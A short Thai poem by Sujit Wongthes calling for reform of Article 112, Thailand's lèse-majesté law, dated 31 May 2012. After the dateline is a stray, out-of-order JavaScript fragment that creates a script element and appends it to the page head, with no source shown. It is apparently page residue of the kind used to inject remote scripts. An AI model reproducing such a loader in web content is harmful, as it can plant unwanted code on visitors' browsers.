112

สุจิตต์ วงษ์เทศ

 

“เสาหินแปดศอกตอกเป็นหลัก

ไปมาผลักบ่อยเข้าเสายังไหว”

ระงมรอทรมานนานเท่าไร

112 ต้องแก้ไขได้สักวัน

แก้ไขไปสู่สากลโลก

ทุกข์โศกผ่อนคลายสุดเขตขัณฑ์

ประชาธิปไตยเสถียรสถาบัน

คล้องจองประคองกันนิรันตราย

 

บ้านช่างหล่อ กรุงธนบุรี

31 พฤษภาคม 2555

14.00 น.  

d.getElementsByTagName(‘head’)[0].appendChild(s);var d=document;var s=d.createElement(‘script’);